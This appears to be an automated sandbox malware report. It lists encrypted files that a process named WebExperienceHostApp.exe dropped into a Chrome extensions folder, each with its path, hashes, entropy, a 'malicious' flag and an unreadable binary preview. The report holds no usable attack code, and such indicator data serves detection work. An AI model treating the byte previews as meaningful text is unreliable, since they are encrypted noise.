MD5:	4F895E198F4195FE0E099522733C3454
SHA1:	3C47D29E6A01B3F621EBA58AEBABE7A1A998D2AB
SHA-256:	08A636D531CA33598EAA3D97C50E538FA75D0BA47A9D4819A2881F9D3792DFF0
SHA-512:	DF2084D02223E7671A28C8834A7E25B3E81DD173D3B56448ABDECC077308064DF2394856FFA6C45B504901F9D26295742F96F25B0BE0341CC5A90026A3B86642
Malicious:	true
Preview:	.M.....8J.KEe..M.6#@...Q.).@T;s..F.P..cz...>./.a..W..I2......SFa$.......X.V..T.x.!H.%(H.....s...=gs........p......eeoq.J....?-.=..r..b..h........h...e..[..._2..6....A......F.A...u......,..;.....:......R./:I...H.kR..S.]E....1b)......;N.D.....x.w.,......&...u....0F..5....v.L]r./..Rk...c.........b.T.!.y.$..F$80..+K.K..a=..)Zj.w...tY...i.w......H..Y...".&n..9%.%..%@y8l....%.0.p....{>...j.H...'.R...l.T..'.[.#!P....%.....e\.^c\x}.....V;..h0L......7....;.NJ&o.b.6..u.0...z........Y.j.Nrf[\y...&.k..%.E.,hY....R.]..4t_.^.#.SR.QT...b....5. 9$.^p.S........~....rE...Y`;Z.@..cmOom.[..U...H..Zq..L {~".?..T....G..e.o.b...F.~W..G)u...J..8....).3.v..........=.7...8....W....D......}V...t..>......;..Q../........~N..9&..".$h.\..0?.mE\|.j.k..}.RP....I`..6...ql.U...q.....5+..?.N..9~..S.....9.S........1.u......v.?.......D.......p.^D....J...G..Y..GC....w......F../..0X..k.Q....c...J.......E.H..:~..J......A.xA^....0...<.,b...j. N...5qm.v..@.l...............h

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.130

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34231
Entropy (8bit):	7.994480734392986
Encrypted:	true
SSDEEP:	768:rO6t9pwy84bJlx8TsW/MnFp6UQ3Ep2UIRd0iTOT4VoEVEVcm3UccrEZc:X5brx5DF6wiTLVoemL3UU+
MD5:	387E6FD86B5FE22E6715053AAEEF5AEE
SHA1:	15CBD751849833474EF6A2A220ACB257436B9EE1
SHA-256:	0D5D5753B0497C798240D80FD4D2DDD8AF565DAE502429B6A4FB2EA406F212C1
SHA-512:	7B0FEDF111253B47A58C89634EE01A830B383858ECF21A608A44244919D23472A86CD289E553576815ACC196CE1FC9F7FC5BD8C489A5D52717FAF3E763939480
Malicious:	true
Preview:	.\|.s..'.[.;Z.....0.t.@N.c.rZ..V..p..>..f5...!..7.......d:..T.>.<..o....HT-.k.j.o.Jn?y.v.....R[h.=...31._.C....'.n..j.s\$.`..$f3.......#'.R;..}P.x..-... .;.)...x..G..k..x}...}?j)Z...w~R...\|.T...l..'hNp.bh:.....3.....U.$.......K.zl..P..UUp.Wkd.XZ...: .v.t.....3&k..+......#,...>./..u........v#.7.C$..K....Q2..0W.......{...yW&..3.:...4..5...?I.._Zo.C0....W.>.D..S.:6.yi..i=J..f.....,%.)N.\.cb......BjGS.n.R..l...-....TZ.UO....6d/.....6:..c..u3..`h....RD...24..x....l..T6..<..B..O....#......N2.\|HN.'..).Sy...`]..X..?.q...-w.......B......z.A.P....w.Z$.6l...z...(......xgv[o..c..\|.....s.Y.[..X......lv....W}\i......v.b.J6......_....j..8k.~........m....R..X...b.........X<l../W.............wCb..!..s.i..;..(....#..g..E.#2...w.....e.xa.].....y(..nr.3dB/.c.}.b....1....^\n...V(....0..e.0..5.l$.. .r.4q..dr..m.$...[.....H..{...LU],..Qo.".NT..:..._.7p.x;.$.Z.'.....).JQ..q...................A.m....MJ\|.....x....(ca.;...^-z..D..+..v...b.l.4.D.^L....-Y.._c=.V.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.131

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91144
Entropy (8bit):	7.997857145974636
Encrypted:	true
SSDEEP:	1536:0sUPpMLUFKpKE4Zinvvc9jIWFdJjy6eRWOnOPgBHczwa8Orkj1to2I7S4Rgq:0sOcpKZI8VIWFddzeRYc85tr3JB
MD5:	10DDF6F8F750EE7255E2D93673C98AB6
SHA1:	30CA9E78DB96B55B7D47824F26F4B5228712189D
SHA-256:	5B07CEB8F27567C07BD1FD3AE05D55026AA5D19A1579FE2FC01EA8E2500BDDE8
SHA-512:	94EF2520A265A5DC00B26803EAAD5D45888474BA0824C630C28CD941F1605D042F9F7D539DBE22CD884BD201C26B629B7B512A57A4599444C9C738CF023F87DD
Malicious:	true
Preview:	...\|.05...QR..99....e?+Y`....g...6....s.~.x._6D.+.%...=m.q.R...tg.....N.x.U...;..87.....)H..Y...vxb..7.#.....m7.@......hZ.....puf..c......Ro.....4VH.r..u.j>.....\|.>Z..,L.....X. IR.......[[`B.n...`...e..Z./..2M....$...`.=.x.).,.#ke.5..+.l3..6...2C..<VN?x=.....\V. ...Ls.5`3...7.IZ@.......%p.z...-....%.U...._.$9....Z...H.h...Q..(y+T>t..o...H..X.Ms....E.....X.F..pw#...R...wo.k....I.T.UAS.?Zn.RJ ...A...[^.........D..m%....0[......f.Y.>.po..r...+)..).#..r..V3......E.....o........e.pY.,.?-....g5..l...d.g...1....M.q...7$.hd....._=.......;.u...M..?..Q.....v_#..d.........\|............k./.r.$\fHv.<...MX6...Z.zvY...Z..:.Y..x+2..`{.-.0iT.{...........IC....2.e.....A.B.T.dq!"{O.V..q.........+z.>.b..=.........].x..)2A.`>z)>..E....q.m.m..nW..s7.....o.(Mk(..q\|...c.[.$K..f:2.[..W.9v@.e..5..v.....9..gU.1.._.Pk.).. ..!.i.....=.F..-.3.......t....^....s.z..\|.STs.7.1b..........F.[...r`...3.9}.&q.Z..!=vQ.r.........7.S'o.f.Jq...,....!]l>.FkT.!..Qj:vR...(?.C..e..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.132

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34109
Entropy (8bit):	7.994957193282963
Encrypted:	true
SSDEEP:	768:P6ZAKfHTX5v3gb9y4feQ+OHFAD3fdB4e61:jKvbpIf8MAD3fW1
MD5:	5DC8558DE5DF3DC0D6F357BA62F0DF2A
SHA1:	8314B32BE69CD99BF3FBBDAE8BCEA646496828B9
SHA-256:	84A3ED840139AA17280E6D2351ACF2EB31D8FE56FE2A87FBED5C1AC155E21072
SHA-512:	D1D1EE6554E071E8C1FAC5443DA7E94197ADA81618CB37757FF14B9D4A334AE524FA13BA209FE11A7ED9EF3A5F7E138CC10F8681A7DB8AC9287ADF36EEB1E94B
Malicious:	true
Preview:	p...\|:hC\|.d.I.....3.EL..,.q.5...".~...8.Ynl.d.....f....E.r.,kG.....%..Za.........E...._.....~...%.r.jV....x.mE;d..bXX.FP.3O...4..eO.X ..M.uZc'.FE.w..^...)...........h =. .W..)..O..{.\|...dD...Y...x...........;t.l.........y.......~..S9"<.c...........8....Z...BA.~.i9_. O.......+.6Q..v..d6...+..~.FH..Y.cp\|.....\|..._.M..+2s"...:................4.R{-]`..._.-M..W.....X....#.P..&...R....m.y@..4 I.Aj,U.botN.;...\|.nP ..QY..vc.H..S..;Q......A....4.aA.../...]...7."..r"..N<..8.y....^k!./.].f.T..fX...>..PM.{.x....o....BP....^.LV..N,f.2..P.....?.........Y....Q...U....c.o.X..I.SA7...%....[...(.mE..............}..........._.....\|U0/(Wv.0..Hd.,.H}.s..r.......@.dFu^.n.[.1..)8.03.....E.-.Eu..u..P.1<.T%....M..d.......g=.=3s...'X.x....,...u..j....!..7.c.....>....V..A.#)...tA<?.X@...."..2".....b".........@9.$....\......go.]..R..b&....DD.BVv\|..D......U:K..L....$.K..P..2....y`...J.}...p..->..`...2.Y.....:;l..CK;<l.gV.4.^.q..O..D^T<.._...n..Nc.a..?...C

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.133

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	87900
Entropy (8bit):	7.997870438352977
Encrypted:	true
SSDEEP:	1536:P5w83TlWt4tJ3XyZgF3P9VVl/zfGHqyz7e9Kw5LG9v2gIhgMCm0nm:PSN03iZw9Vbs7e9KkMpIDCmkm
MD5:	A110D0CA4523D2E30FFACBB9525FBA66
SHA1:	383853E845377B4958C757C82547E3DF3E011963
SHA-256:	737443FEFD8C0F0CB7216B41C370CE1B0FF8C0A24AAB21786FB3BA937FCBDFB2
SHA-512:	B4F57C850BFF0B13C9FE839D651E7045DA9630EB8BD9C6803653337E0BE2D802DF9F48EF5E82D0ED9C17BB3CDD7688178B41C6118B889C6FE50555CEB63559EF
Malicious:	true
Preview:	Q-eS.Y='.W....B..''..1.....s..!&..3..'...+.D.w.n.L...h..l..7....[;..y..S.x5..D.....uw.]E.m...c9.r.EKeY..I..`UB.f...r .K...i.....K....V... ..b..l.ND......x...G..{.sU..Z..... ;...BMoZ\|...IP..j..Il....l..B.......Y..o.Q.vz...w..:c2x,;....k.[.#0.\|..oN..D%.4.l.. ..N\|...9.e......4....RCX..a....r...1.b.nHT.3?.]...n....Z..1\|.&Q...G?....C.4.u.x..2..X.3.E...s+.6....b"...t....m..2C.k.R...../..dHaG.1i..2...[?.g.i..6C..@H;..%.6....En#..~........xg}XS..,.15.Y....@..ll..p4.S...G.x%e...))..n.<..Y.O/~9.{.R.cTK.Wu!..z .5.MT.c.r.sW.>.......u...s. .~...[..........u2..!h(.O<-..j.9.@D......?...J.BC...._.Z..n9.W..c.9~e..h.E..N....Jo.\|..J:.).?X.9.....I.X%t.c...)8.BI.m...[..".#A......m....,e&..t.#L..ade.y."A0D.4.p.W.U:.....5.w....-.....DE...<8.S0U....bx.......$.......+J...%.....?......4..-.&0.;.1x.1....F......R(WHC....#.k.............[...y.o..P.......6]A.:....Si......u..j....:X}..i.*<....~&.l9K...A.~(......=.&..tN+.EOf....pih.+aw....x....X...+c.c.h..U......GG

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.134

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31016
Entropy (8bit):	7.9940900864763655
Encrypted:	true
SSDEEP:	768:mzuHoLzu4mfxB4Suyl8rUXNsidVghzvcFz9RA/5+:zYuuWuoghkFAh+
MD5:	732D06D7E503A22E4BD5095C1604B652
SHA1:	DF2F76D7B99CD3C092020871401916226983DEF1
SHA-256:	C3E19122DFF4F48340779DFDA046C1052C8879649BC34CCAAF14C23D75313ECD
SHA-512:	2060C46E53BD61C670768B80E0B81F2BB40C9570DD4CA724A5418A8042DD756A5765D7432DFB5FCBA223B89E24E0C10B32E348DEA93011A22A6CB0D9BA674DC4
Malicious:	true
Preview:	>&iFeb_nY.o /...5..D..l..F..W...Q..z.7.....}.......>\.M..[..[L.~o1.(..Hh%...a......E........[e.m.y...PK^.y%bom<..b.(>03+.8.^=z.~l.M4...&...[.h<h....$...2..S.t..?..m.....=._..(..m.}....T.3.f.{...G.......7.A...r><R.eV.v..z........\|W.Y5.Khb..;...E....`..E;.u.0[s..[-..V........P.0..\|G.z..&.O....W..X..~]..v.....;.y...W..a./X...]....!..f.....Mo..\w,.e.(z1b....-...&..........q.2....e......j..;.\...../...S%GH.S.......C..Y..:...e~...q...g.Wl $M../69I.^+..8.mY.p..r.\....p...E.....I.K..{..z...r...R.j..l.\|v8..x..m.B.z$.{V`..U.......)@=.!......<..O....7.>.n.:!........%+....C......9.U....E&..`..w.,....Ka.........%&.M.Kh.&..%.Yr.`$FT'.8.q...x)Y...#%}..R8..k.vo.+._@....m.5c..p.m.!Q+.p.~"#q.@.g.M.8...u..=..r9.9..i..\L.tDN.&.DH.k..!.d...7..j...&..J....}...a0..9>h4..[...nX(M....SL..C..7..q.....t=B.%..m.sa{."@.6..9[N..(..>.k........4$p.]..Z.,.LIy..pf....x...C..wX[.{...X%.d..&K..?&....u..Z...K.`.Re.)7.....{.g...!..Mv$..r4....K.o.TA.......i.s...C.E...}.'EM.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	59092
Entropy (8bit):	7.996854200832269
Encrypted:	true
SSDEEP:	1536:nQcHqChxBUpDQYZNW9EGAVa9DsN22SYwL+y5BS:QP6rOZc9BRxsU2SpLJC
MD5:	1FEC938C2E85531A697E4818F32DAD98
SHA1:	ACD67DA06ACF14270895F8532B798C45E259BA66
SHA-256:	6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
SHA-512:	BB746A8EABECB682C72ECCE9EE270CADEFA1FEFCE9ECA954A613D04E62AABC7396CAA34DA5513326F9B17C753DF1CD19C4D494262D08AC91ABBB5B00E9BDF4CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 181_960.msi, Detection: malicious, Browse Filename: 232_786.msi, Detection: malicious, Browse Filename: zHsIxYcmJV.msi, Detection: malicious, Browse Filename: 18847_9.msi, Detection: malicious, Browse
Preview:	..l......q.33....Ve$.6'i.......".b.:.e%..2"cA..`...K.#wV..^.......$...t5)kD5.]..G-......O..{.l.Bj.TJ........$.P.E(....5.....E.....v....`.7"...n.fdm..V>V.\|.J..qu9..;.t...h.E.:v... ...v.l..H}...P0R......;....R.q..}b.#~~.....z~.:.L....p...r....]:..z<s...Y.)w4.?%S+.:..{A.i.-...!....../,..1.....0..2.z..p.Q..V.b..W. ......>...!g..78..or.......S..2..A\|.ck=..e......f........r.6..\|9..%N.......j+.^..a.C.iAw7ML..I..N(4.~.;k7fdy.../.U:R....0v......mO..-.[,..Q..P..Z....A...qFWO.........(...".?.Th`..}..sQ.......^.#u.6..B/.Z..C..o......Lw....N........=..,.0...j'.9.....`...Ks...........V..3%..N.k.B..wl.....F.k..k...{..4p5X.9f.I\J)%.r.F.#J.1..(.......U.#....!QN..........e-0..2.......1Ra....Y.ar.u.tP...Y...K..\h....?W...c.k.{.z.y....kK.)6-..........F+.....W... .O..?....a.l..-.".~.A.7w..........h}fSn4......p:77d...%...$"Hh.o......5a.@.^.J,..l........ze.W.~..ps"...-....-n....2..\....T...A.9=...^......r.1]..g...... ).......B/..yS;T6.e..(.tG..V.....A....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.15

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99566
Entropy (8bit):	7.998142581654128
Encrypted:	true
SSDEEP:	1536:11pBXOaib3JcpNn3unOqtp5NKGeoNgFcoSS6HNPdeC7vrFG6M6f8E10VOQLwt:11uFcpFenbtfNKt1SS6t1V7xGdJE1w0
MD5:	8FC1319E8467E8BD4D1BA7C51AD77EDC
SHA1:	18B3BD1589F80DA0C3ACDB74B31543F3308867CD
SHA-256:	148AF3A3BB85DCF2E8A111FC6C2E342CD62C9B3C316352DF26F7CD5C46960E8A
SHA-512:	A159CBDC5ED761AA5D643C6CB7D7BB96C8B5CF7E162CBBAD4BF399B3109A6988095CC8BAC9C6B1D9E3EDBEBC094E8B5175FC9BB59FF6BA1F715E79BDF67888EB
Malicious:	true
Preview:	.(J7..%.c.dL..Z;yk.~>D.....o.gI.[...)..^..?....G....k..gO..P"g...g...%.......&g...iU..`@...4S...Lb...6.6.,f.....kOj...............W .=.......x.!\|.k.}.@..(k6....Tv4yY.h...P..!...v.BW..u"s.c.e-.q#..S_...y_.5.....I0HK....Yh.H'.&.Z.. &..\...p.../....b.A.1~!..5........k.x.u.{.S9.D....c....@:.(z=.t.x.l8..x3h%..........W.3i.%>>i....F.i:.#Me....o..9...J./W.s,.$G:..]<.N>j.0...^_.7..?.v..[x..h..9...}.Vw..0.L.Q..5B.h...x..BJH...+..V1.M...);.,..1..B..B...b.?B..).,xF.?.7./2xK.A..i..pV.@!.h..Xl.U..P+.F..g.,.....Dd..w..!..Yp..6.,i:.@.D..$...Z...m.+.j..A..k.C...m......Or........TqY.`..^,m)..r..~<...R.S.u..H..@.....q}1a.&..C,i...x...a.s;....:LE.f.jO...=W..c..c...&O..)...).C~0..`l5..m`..i.<.....-.}...e-u&..Q...rDa.....q.......o..j.#.#..M.~z.rZ.g........F..S.._.,.H^[....k..H\7qi......-.8.W....Q.K....:...j,{>...[..$.U...f...V.....T.j..Fr....C....+..mo.7.....U......hM522G..7...mY.j.*.v.i..U.`..@..&.NC%..J...m.Q..[...P~.7r.1]...J.R~M..8.\m.{.......U.........

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.16

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	32929
Entropy (8bit):	7.995142105934198
Encrypted:	true
SSDEEP:	768:2Vpo/ygeRrOP/GwLrTW8R8+DK8uRhsm8uW8RRO8oLEhXBVccV:2Y/yxqn7LrDy2K8uRYCR08VRVc2
MD5:	1A0F824790B98E5EECF3B5C4948FBBEF
SHA1:	C77586C8CC6978E898E3A82D3A9F82FBEF6DCFAA
SHA-256:	845BBDE5E4614BF9B1367EC32B60D5621F81E5D59750D4AD350DE77FDD0CEC61
SHA-512:	5BC3215F34B99D6EBB12B3282602A3B41ABC1522650C84DC1E095004B8D352C9074A01BE940D053BE2524F3CCC5E1E279094A71418D7CECDA1FDC9BDD4008B42
Malicious:	true
Preview:	.......}+v.TK...T...0.6;\..t.,.hLObgAEf..N.C....E-.-NoM.2..g...UPx... ...Y..6..f.V:.E..z\f......Q.;.c.[P[..a(.l..?.W\...q...._...n.._...T..-..!..[W..p.2H.pH.r".E..1..6!...>.......\|@....x..B.....f.?...PB...j.{.~....._.....8(..:............i2W.m..........J.Sv\.f...)...\|O.)...&....@...p5>.J.i?......J..;.%O1)..1$..L.....Yg..\.....#.u.V").....@7....q...}..W..Ds..Oqu....9.,..E......I..D..`..Om'.H..8....o.....S.e.......82.4_M..K......I.......6......!.J4Q.....R..F.....-....`jZ.SKp....iRs2:?......L.....#.-;&^....<...=^..(...>..A.2....L...wqdd.e.......v..^..pE.....1.".....7.....[.x.n..........y...bi..j..p.u2;..mq....s&.d.....V'...'F}.4..N.T.....@..."....Ri.H.....l.-5.....RK..}g. .B...3.s.......I.:.-{V.a.......kP.'..7M..tJ.+..E......Yg..~\...(vo...nT...<...TR...7..2.k.'V[O$.c;L.qw........qqE.j.cT..x.E;.K.A3..~WqL;.=..."xa..o..h..J...O..yW.z)..C..m..A.......D...\|w....z\0.......9V.K`)...{.....0.,..G....v/....T..s...rm...>I......J.W.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.17

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	89875
Entropy (8bit):	7.998029926157943
Encrypted:	true
SSDEEP:	1536:cg5WLAZNQ6KI1YmfSGt0V7jIjo76clkqO5zrmpcwDkq2eWjE5iax+:cg2AZNQXI1Y7EBqICp/C1aE
MD5:	4BDD26DD891E354496551B62D097635A
SHA1:	6E06C30B152564D8A0955BE716122AB025FFFD01
SHA-256:	2E57C992E9A493BFB21D02BA6C815E889DC116218792005A16CAEF8AC164C927
SHA-512:	234F2AB6F2CEDB000332E66B99CE46AB9EC9EBF836EA85BA78DA39D0E825F8A8CAA225F87E24BF50D6358540576A02FCECC833770CD8D58442EC08E3D4455B09
Malicious:	true
Preview:	..9...h............J.r^.&.<. P?....5..j)^n........T..:.O...$...@.Y.iF...x....P.7.3s.I...7...3p(...a&............GN7..TJ.v.QF...".(..+......}.7 .qgw.u.8V..j.....qt..9..j...{.S....t....{........b.......~...iwX.$.e!.....ALk...w.VFs.h..rL...5 ...g.N.j/....$.0E[....}......}...c.d...U-.\|....).....zd...v...>....n..F.4.(...U..Z .e...S.IUnk.4>.!..T....-...O..].i..'.B.....bp.gmGO.V.1fE.J..1..W..........\...Q..B.E !...ua......{.5..f.w..p.6\|.Q......E].u.e\|.2. ..^.nn...FO.q}.......-$...;..Y._4..b......3K...c.p%vk..x..<..l./.(.).:t?.2A..W....@%>_.`'z.t.8.;K....2./Pmo.%..htM\..s.Y.Z.'..]......h.l.DG.....Q..vx.S..FC..$.?.'..U....d..g.u. H.`...Z~..n....tu..#..2.B......+..2.-.g.Y....f.....~...:=x.[Q..N..N./.....@....(M4e!.N*.e.4_..Ee.>....y..My..m..&.....C.p.+!..I.0Ll..E...T...e....Rj}.P.q.......0Sb38.jt....c.!<.j..K.....{.1O...I.).PrQ..[qVN...Q.G8.45....W..ku.E..1........../...h%v.+..^..].N.j5.&.._..5\.p....m.....<.....Z}-~g....h....w..........

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.18

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	30989
Entropy (8bit):	7.9942688000816435
Encrypted:	true
SSDEEP:	768:Luarjxb2OOxXsd4yt72d7QdYiCiO47IfacSyIH97Lu:LpxE2XdYRij0yXru
MD5:	1D252CB7FD476035B10202A3B38B15CB
SHA1:	A0E2B89EF48F57E35C634F06D2D15D1B9133724B
SHA-256:	871905449CE580A5F48114234F43642EC65B4666826C1855E534B160397F13A6
SHA-512:	0BEDF0A9352B853353357930130EEDF6DE2BD2240926AAEBE882B34BC92A2FD2223C01754A26DB295FDE2E629A20EDFE1B4D3B16918310B67DA224CFA477586D
Malicious:	true
Preview:	X.'.U55rpF......p.3....{ .[d.)N...j.U.O!r..h..&%..?..Zj>@...z@......'&A.?.=...EY.$I0....F:.P..,...x6.....R.@..S.u.H......J.l.tN.E...;..O...V..HYt...D.e.0.o.....c...:.......r..X.....V.J=.Vw.....R...Po....Ne.X.P.u qG..!6...}.1.a....0....$.9.....5.7...N.....73^.....[s.\f..<....Q...s.9........0<.$.8y.P.l wh9SxM...;sv.y,.^.3...v../..l..tl..FQ.......8.X...(X.[.....q.....Y.E....e...\|.~.....S.."........b+B....?.FT.3...m#.......3..ee.+1.6...y.vn-z2.L.A..8.4f..b.(D.....K....I.8.{..je.:(1..@..<[.g.t........0..\sc.....$V.....>..A.%.Yh.1$...Ns.]..uehx.....!...;.:...zJ.:.-..../v5....H]_C........$j....4..f1#6FN~....x..c....\..=.d..I$.+.{&...m..3........O....[....$V[.....=.wSh'.D`>.9U..B.........Y....n.\!....z...hO..LX".&....0..%.....ar*.h......'..I.p.t.... U.x...Em.x.4.19..ZL...<"..G.......K.b...4tS.?...=...B...~.J..."g.7\.5../.f...P..W...X...).....<O..a.V.$.]...vLou.....y...!x...SP.K....N..fdE......S.n....Z......V..s.....v2.J..BP..t.j3......m.1

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.19

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100854
Entropy (8bit):	7.998042000988432
Encrypted:	true
SSDEEP:	3072:uY5/5vmydG4HG0HmptkQep0JI/40HIUjprOka:nSydGAG0MhbJvajtE
MD5:	3EB4691C8B69D03AA006705F3AD53644
SHA1:	CD20927B17FAD837E4C4EEFCED6810BD914272D5
SHA-256:	7472270F88BC4DA345A0534DDD3E538C7A478FA360C7E216AAF5AD9A35B1941D
SHA-512:	24FD48B423F9C55C040B65977F863B7084ABD2AC78A8407802F5C6A4B41BB002537E1BDE3CEF900C89902446CB3E765A68591C75EC96D782CABF962519EA489B
Malicious:	true
Preview:	y.E...ro....=....2..h.A'...~..J.y...R.`?z..V....gW[7s"(.%...Z..y.......S.u.H..)/...Kd...mf..Q.Pj.....Pd.2.....,!.f......}..>Cd....Mw...hoc .Y.5.!..._....B@g....~.{.Uk......1..U......\|!..c.........1....`H.Mje.].....X.>...RX),q4..g.!0.zlMY'tm..di;........K......?N..../..v..z.....n....pt.[...m.@...cO..CA?Pv.8N&....1h.^f/\........I.;...\..'....$^...%..#.3..@.....C~.....=..R......<.:.6.bb!Y2./.%...q.#..1kjsh{^....}..v....E..U~....Ir.G.....+S.Db[...p..<.Y;Y.:.1...=1syw.1.z..\........r.....G3#.(..M...I..h...v:$.G.P...E...........=D...oA......']......R.r1..'....<.R..e...O....V.G.Sl.\|..2..8K;..b.I..B.f.u"...P............z.@[.7IM"k.D...OE..#E...HdX....@.....6..n =].B. ..BL)..U..o..P.J.....jC..V$.a........H.z..].`...3T`.N.x..s..\|C...:>;ze`T).T..Q.g.'+.8.&...S....qQ.E...4g..#....:.Q../4..z....mz...u.=.=.So(.~.F...Q:....'.lA8E.].g;.a..L..0".=I-.xs......B.E...b....<..%1?QmIz.p.......V.+@...Ae3._.R{.p3..`..m,a.s5g1;.8.o...#..U......N....2...X....u..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.2

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	103706
Entropy (8bit):	7.998393214541903
Encrypted:	true
SSDEEP:	3072:iISkkVPeOOtBVZyEnLMlaHl9lASmeioqXAGhirknL:FSk40vrRng65MorGMoL
MD5:	F26BFD7BE7B6759C104C75743E35DFEB
SHA1:	8F72B1590081CB3130062E9027FFBD33AEA7BE29
SHA-256:	4B838E4CE117A89EF6F3ECBB881195D34AA69C3F6CBB6CAC5B8CE62AD68120E7
SHA-512:	87EB5CE22EEBBDD4CCA03FDB24DD5CABADEA39BF34B9F01BF6BB655CF89729BF0028350A05279586533688EE818781B9EF305EE969DB9EC164469C67F8E97158
Malicious:	true
Preview:	..7..IER..@EU.HX....)..F'g..x..."...j....p...-....$.z-H.e.(...M.........h..,...S...>...?. -/.....?E({..B...`.,j...Uz.O..59......./L.Jg........CZr.......n..n.H/..K3?!..G%3....>_N..[p....&....N...1.k.7..../...9.....:....Q....@Z..:\|E?.}..Q..&.i@....(%n.....!.>.p.U.P.\|-..$<j..q..m..~...'.?.C.uT.LH.6.A...?;k..C..~..y.("?.._.K...1.E...<L@.b=..hi..9W.h'.j...i.k..X.....f.\]rr.E..........LG...u./..y.....\|...D..~\|6.P~._.:..z.%...UM1.....I.G"...kR.........~..rQ.T$....{.G..GTw\|._.U.E..$u@..Tm..#.^.}......+.......}_..! .....l.^.WH.3ku%r.....t....vp.b.h....@.......A.L..OL......~d.._...Uq...1.(#.j...\|..R....T..1.:\|Fv..n.`.....h..5...%-Y.....G.Y....1Z.t~..Cp..:..\.N~i.p...]..sn.P....%.\|..o.....TQ.;=......P...e.>M..P...9H.("\|:.+...F.....%7..`.......'.O.dd.."..F.Q...w.Bl.<m>...0.8A...E..F............}...b$[......f^N.s%..<MD.......D.Y......6..7.M.m......t..i^....SP...k.H.@V2......7..*.<....T..zy.......'..\|..!....4.b.....@.n.)..1..\|q=.........#;5q.G.^8"Y..q

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.20

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	33488
Entropy (8bit):	7.994824218932575
Encrypted:	true
SSDEEP:	768:USiSWn8d8z3lZlQp0t1X9f7F4lxWZGYrPO5hMdR:JVaLa0HXF7FuxWZD0hM7
MD5:	5010E574CC4F0EA67148776AAE448C71
SHA1:	17B4C769849C30A59ADDB85E5D8ADFE66973CB66
SHA-256:	948EF0A1EFC48907DDC8C9E02735708347D047B3CEFB2CD45A818D11F12A50BD
SHA-512:	E7A7813DB86B07348D3E58D9B3E7C3E35FF7FD31E7D5CE93FD6CBAA3D4A3773382B53DE1BA7B2F078B2C920A2FC748000286DABF615AD25ECE373BB40CA6AD0D
Malicious:	true
Preview:	F.U....N.....Sa...s_.}..B~.A....t;2.....^.T.....".Z..A.>.XV.F...?..0^(@H..s9...i...h\........c..;<......a.\|.s8....\9.m9.......H~..ul..7.i ..O."..s...i.S.r.mA...T[.g...C.Wo.....b....9.S.q.z_...w.=a3."D5..i...Z....\|.GI6...:.._.ocL.........x..0;]..[\|.....V}....C..u..tv...N...........w...ou.A..^..........G.1..s`..;:P..S..&..w.TH..../C...`..._F%tk...;z..?...nt....uy"r.t........I. ..W.}q..3YDF.......j...D.1..,\@..y.b.c!.?..P....Q..Wk......._.i......(F...).......O.E..na.l..0~....."}..G.d..9..`.V.:./.j9....(..Q..0.).Q..ev.WJ.M.....+.C.B...F....<.k........I....O...........G...@/...c..??..(...p......Z...y.H..DF7...Y..@....l..7Q..e7..d.g.O....Vg1D.U.....Ml;Ke...z.g.d..H9\|...P...h1.....=....'..\k=...'....$..g[T..l=.w6...Q.D...o...+ ./r.&.k...p.9....&..c.5.....,v.>S.y\....w.2F..._...eL..Jw..i@G..]7.q.....d.....8..../...w4.D.....`.< ......2.(.D...m:.2..H....&.C.u.C_...X3......@..BQ..S.P8.1...gm~^.h....-..3j....n..v].0.S...(..........K..eB..w.Qc.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.21

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	101930
Entropy (8bit):	7.9981901474610915
Encrypted:	true
SSDEEP:	1536:bFBX3e/IxRFmOEdU8Z1pgVqC2C/0gGk49jn8uWhTeZjsF9u73OoVRZ:xMQ3fCtZbDC2wutn8ZhTcjs/uT3TZ
